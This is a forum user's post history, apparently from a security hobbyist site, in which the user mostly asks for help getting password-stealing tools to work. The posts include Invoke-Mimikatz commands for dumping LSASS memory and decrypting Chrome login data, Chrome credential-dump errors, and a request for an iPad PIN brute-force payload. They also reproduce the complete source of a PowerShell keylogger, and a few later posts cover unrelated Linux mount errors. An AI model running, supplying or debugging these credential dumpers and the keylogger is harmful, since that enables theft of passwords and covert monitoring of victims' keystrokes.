Jump to content

eeeeeesy

Active Members
  • Posts

    23
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

eeeeeesy's Achievements

Newbie

Newbie (1/14)

  1. I also tried nishangs mimikatz with the command Invoke-Mimikatz -Command dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect But I get this error about /unprotect so its not decrypting the login data from chrome. Invoke-Mimikatz : A positional parameter cannot be found that accepts argument '/unprotect'. At C:\Users\user4\Desktop\newest working mimikats by nishang\Invoke-Mimikatz.ps1:2754 char:1 + Invoke-Mimikatz -Command dpapi::chrome /in:"%localappdata%\Google\Chr ... Could you tell me what I'm doing wrong?
  2. Is there a working Get-ChromeDump.ps1 or Get-SessionCookieDump.ps1 or nishangs Get-WebCredentials.ps1? or do you know how to get the Empire version of ChromeDump.ps1 to work? When I run the empire version, it dumps the search history fine but when it dumps the username and password the password does not show up, just the username and search history shows up. I also get an error when running Get-ChromeDump.ps1. Here is the error when running Get-ChromeDump.ps1 Exception calling "Unprotect" with "3" argument(s): "The parameter is incorrect. " At line:153 char:9 + $decryptedBytes = [Security.Cryptography.ProtectedData]::Unpr ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : CryptographicException Exception calling "GetString" with "1" argument(s): "Array cannot be null. Parameter name: bytes" At line:154 char:9 + $plaintext = [System.Text.Encoding]::ASCII.GetString($decrypt ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : ArgumentNullException
  3. @Darren Kitchenis there a payload for bruteforcing old ipad pins? and do you have the link? also would need to know what ducky firmware to use for that. im thinking twin duck c_duck 2.0 firmware.
  4. How can I do all that though? It might take a while to post all that on here, so can you come on irc.hak5.org #hak5 and help me when you have time please?
  5. @PoSHMagiC0de I'm just trying to use it to dump passwords from memory . Any idea how i do that?
  6. @PoSHMagiC0de Ok so I got the BC security empire invoke-mimkatz 11-25th update just now and i still have the same error 0x2 which means .dmp file is not found even when running as administrator and bypassing uac. I've done a search on my entire c drive for lsass.dmp and cant find it because the .dmp file is never created. Can you please post a link directly to the invoke-mimikats.ps1 that I should try? Maybe I still have the wrong one. Invoke-Mimikatz -Command '"log %TEMP%\mimikatz.log" "privilege::debug" "sekurlsa::minidump %TEMP%\lsass.dmp" "sekurlsa::tspkg"' mimikatz log: mimikatz(powershell) # log %TEMP%\mimikatz.log Using 'C:\Users\user4\AppData\Local\Temp\mimikatz.log' for logfile : OK mimikatz(powershell) # privilege::debug Privilege '20' OK mimikatz(powershell) # sekurlsa::minidump %TEMP%\lsass.dmp Switch to MINIDUMP : 'C:\Users\user4\AppData\Local\Temp\lsass.dmp' mimikatz(powershell) # sekurlsa::tspkg %TEMP%\lsass.dmp Opening : 'C:\Users\user4\AppData\Local\Temp\lsass.dmp' file for minidump... ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000002)
  7. So do you have this totally decoded invoke-mimikatz script that I can check the save path of the .dmp file?
  8. @PoSHMagiC0de Thank you for your response. I managed to get this powershell script working with this command as administrator Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::tspkg"' I read that minidump still works instead of the lsa permission method. Now the only error i get is error 0x2 which is a file not found error because tspkg cant find the .dmp file. I cant find minidump in the script to see if the proper code is there to create the .dmp file or what path the .dmp file might be saving to, and I believe the minidump code might be in the encoded base64 string which I do not know how to decode. Is it possible for you to post a completely decoded version of invoke-mimikatz.ps1? I like the default powershell script because I do not want to install .net framework to run it. I really want to get this script working if thats possible to edit the save path of the .dmp file. Here is the command to run invoke mimikats along with successful minidump and error 0x2 on tspkg https://pastebin.com/kFTsp2Zk ------------------------------------------------------------------------------------------------------------------------------------------------------------
  9. @PoSHMagiC0de Compared to the rest, this script actually runs. Thank you, but I'm having a small problem. My issue is that I get a memory error and it exits. But at least its not a code error. Can you tell me what I'm doing wrong? Here is the error. .#####. mimikatz 2.1.1 (x64) built on Aug 3 2018 17:05:14 - lil! .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz(powershell) # sekurlsa::logonpasswords ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) mimikatz(powershell) # exit Bye!
  10. function Get-Keystrokes { <# .SYNOPSIS Logs keys pressed, time and the active window. PowerSploit Function: Get-Keystrokes Author: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .PARAMETER LogPath Specifies the path where pressed key details will be logged. By default, keystrokes are logged to %TEMP%\key.log. .PARAMETER CollectionInterval Specifies the interval in minutes to capture keystrokes. By default, keystrokes are captured indefinitely. .PARAMETER PollingInterval Specifies the time in milliseconds to wait between calls to GetAsyncKeyState. Defaults to 40 milliseconds. .EXAMPLE Get-Keystrokes -LogPath C:\key.log .EXAMPLE Get-Keystrokes -CollectionInterval 20 .EXAMPLE Get-Keystrokes -PollingInterval 35 .LINK http://www.obscuresec.com/ http://www.exploit-monday.com/ #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateScript({Test-Path (Resolve-Path (Split-Path -Parent $_)) -PathType Container})] [String] $LogPath = "$($Env:TEMP)\key.log", [Parameter(Position = 1)] [UInt32] $CollectionInterval, [Parameter(Position = 2)] [Int32] $PollingInterval = 40 ) $LogPath = Join-Path (Resolve-Path (Split-Path -Parent $LogPath)) (Split-Path -Leaf $LogPath) Write-Verbose "Logging keystrokes to $LogPath" $Initilizer = { $LogPath = 'REPLACEME' '"WindowTitle","TypedKey","Time"' | Out-File -FilePath $LogPath -Encoding unicode function KeyLog { [Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null try { $ImportDll = [User32] } catch { $DynAssembly = New-Object System.Reflection.AssemblyName('Win32Lib') $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32Lib', $False) $TypeBuilder = $ModuleBuilder.DefineType('User32', 'Public, Class') $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String])) $FieldArray = [Reflection.FieldInfo[]] @( [Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'), [Runtime.InteropServices.DllImportAttribute].GetField('ExactSpelling'), [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError'), [Runtime.InteropServices.DllImportAttribute].GetField('PreserveSig'), [Runtime.InteropServices.DllImportAttribute].GetField('CallingConvention'), [Runtime.InteropServices.DllImportAttribute].GetField('CharSet') ) $PInvokeMethod = $TypeBuilder.DefineMethod('GetAsyncKeyState', 'Public, Static', [Int16], [Type[]] @([Windows.Forms.Keys])) $FieldValueArray = [Object[]] @( 'GetAsyncKeyState', $True, $False, $True, [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto ) $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray) $PInvokeMethod.SetCustomAttribute($CustomAttribute) $PInvokeMethod = $TypeBuilder.DefineMethod('GetKeyboardState', 'Public, Static', [Int32], [Type[]] @([Byte[]])) $FieldValueArray = [Object[]] @( 'GetKeyboardState', $True, $False, $True, [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto ) $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray) $PInvokeMethod.SetCustomAttribute($CustomAttribute) $PInvokeMethod = $TypeBuilder.DefineMethod('MapVirtualKey', 'Public, Static', [Int32], [Type[]] @([Int32], [Int32])) $FieldValueArray = [Object[]] @( 'MapVirtualKey', $False, $False, $True, [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto ) $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray) $PInvokeMethod.SetCustomAttribute($CustomAttribute) $PInvokeMethod = $TypeBuilder.DefineMethod('ToUnicode', 'Public, Static', [Int32], [Type[]] @([UInt32], [UInt32], [Byte[]], [Text.StringBuilder], [Int32], [UInt32])) $FieldValueArray = [Object[]] @( 'ToUnicode', $False, $False, $True, [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto ) $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray) $PInvokeMethod.SetCustomAttribute($CustomAttribute) $PInvokeMethod = $TypeBuilder.DefineMethod('GetForegroundWindow', 'Public, Static', [IntPtr], [Type[]] @()) $FieldValueArray = [Object[]] @( 'GetForegroundWindow', $True, $False, $True, [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto ) $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray) $PInvokeMethod.SetCustomAttribute($CustomAttribute) $ImportDll = $TypeBuilder.CreateType() } Start-Sleep -Milliseconds $PollingInterval try { #loop through typeable characters to see which is pressed for ($TypeableChar = 1; $TypeableChar -le 254; $TypeableChar++) { $VirtualKey = $TypeableChar $KeyResult = $ImportDll::GetAsyncKeyState($VirtualKey) #if the key is pressed if (($KeyResult -band 0x8000) -eq 0x8000) { #check for keys not mapped by virtual keyboard $LeftShift = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LShiftKey) -band 0x8000) -eq 0x8000 $RightShift = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RShiftKey) -band 0x8000) -eq 0x8000 $LeftCtrl = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LControlKey) -band 0x8000) -eq 0x8000 $RightCtrl = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RControlKey) -band 0x8000) -eq 0x8000 $LeftAlt = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LMenu) -band 0x8000) -eq 0x8000 $RightAlt = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RMenu) -band 0x8000) -eq 0x8000 $TabKey = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Tab) -band 0x8000) -eq 0x8000 $SpaceBar = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Space) -band 0x8000) -eq 0x8000 $DeleteKey = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Delete) -band 0x8000) -eq 0x8000 $EnterKey = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Return) -band 0x8000) -eq 0x8000 $BackSpaceKey = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Back) -band 0x8000) -eq 0x8000 $LeftArrow = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Left) -band 0x8000) -eq 0x8000 $RightArrow = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Right) -band 0x8000) -eq 0x8000 $UpArrow = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Up) -band 0x8000) -eq 0x8000 $DownArrow = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Down) -band 0x8000) -eq 0x8000 $LeftMouse = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LButton) -band 0x8000) -eq 0x8000 $RightMouse = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000 if ($LeftShift -or $RightShift) {$LogOutput += '[Shift]'} if ($LeftCtrl -or $RightCtrl) {$LogOutput += '[Ctrl]'} if ($LeftAlt -or $RightAlt) {$LogOutput += '[Alt]'} if ($TabKey) {$LogOutput += '[Tab]'} if ($SpaceBar) {$LogOutput += '[SpaceBar]'} if ($DeleteKey) {$LogOutput += '[Delete]'} if ($EnterKey) {$LogOutput += '[Enter]'} if ($BackSpaceKey) {$LogOutput += '[Backspace]'} if ($LeftArrow) {$LogOutput += '[Left Arrow]'} if ($RightArrow) {$LogOutput += '[Right Arrow]'} if ($UpArrow) {$LogOutput += '[Up Arrow]'} if ($DownArrow) {$LogOutput += '[Down Arrow]'} if ($LeftMouse) {$LogOutput += '[Left Mouse]'} if ($RightMouse) {$LogOutput += '[Right Mouse]'} #check for capslock if ([Console]::CapsLock) {$LogOutput += '[Caps Lock]'} $MappedKey = $ImportDll::MapVirtualKey($VirtualKey, 3) $KeyboardState = New-Object Byte[] 256 $CheckKeyboardState = $ImportDll::GetKeyboardState($KeyboardState) #create a stringbuilder object $StringBuilder = New-Object -TypeName System.Text.StringBuilder; $UnicodeKey = $ImportDll::ToUnicode($VirtualKey, $MappedKey, $KeyboardState, $StringBuilder, $StringBuilder.Capacity, 0) #convert typed characters if ($UnicodeKey -gt 0) { $TypedCharacter = $StringBuilder.ToString() $LogOutput += ('['+ $TypedCharacter +']') } #get the title of the foreground window $TopWindow = $ImportDll::GetForegroundWindow() $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle #get the current DTG $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff) #Create a custom object to store results $ObjectProperties = @{'Key Typed' = $LogOutput; 'Time' = $TimeStamp; 'Window Title' = $WindowTitle} $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties # Stupid hack since Export-CSV doesn't have an append switch in PSv2 $CSVEntry = ($ResultsObject | ConvertTo-Csv -NoTypeInformation)[1] #return results Out-File -FilePath $LogPath -Append -InputObject $CSVEntry -Encoding unicode } } } catch {} } } $Initilizer = [ScriptBlock]::Create(($Initilizer -replace 'REPLACEME', $LogPath)) Start-Job -InitializationScript $Initilizer -ScriptBlock {for (;;) {Keylog}} -Name Keylogger | Out-Null if ($PSBoundParameters['CollectionInterval']) { $Timer = New-Object Timers.Timer($CollectionInterval * 60 * 1000) Register-ObjectEvent -InputObject $Timer -EventName Elapsed -SourceIdentifier ElapsedAction -Action { Stop-Job -Name Keylogger Unregister-Event -SourceIdentifier ElapsedAction $Sender.Stop() } | Out-Null } } When I run this powershell script using the Get-Keystrokes -LogPath $env:temp\key.log command, I get this error. So then I run the Get-Keystrokes command and get this error So then I run .\Get-Keystrokes and the task goes through, except for the log is never created in the file path. Can some people here please tell me what I'm doing wrong and let me know how to get this working?
  11. do you think this will work? the Moblin Live Image | moblin.org
  12. yes but if i use the name qtparted at the end of my google search then i might find a post where somone has a similar problem. right?
  13. im doing a google search to see what i find for mount: can't find /dev/sdc1/ in /etc/fstab or /etc/mtab qtparted maybe it will help EDIT: I dont want to try creating a new fstab entry because im sure a different sd card will work but im not letting 4gb go to waste so easily so ill keep looking
  14. mount point /mountpoint does not exist
  15. mount: can't find /dev/sdc1/ in /etc/fstab or /etc/mtab
×
×
  • Create New...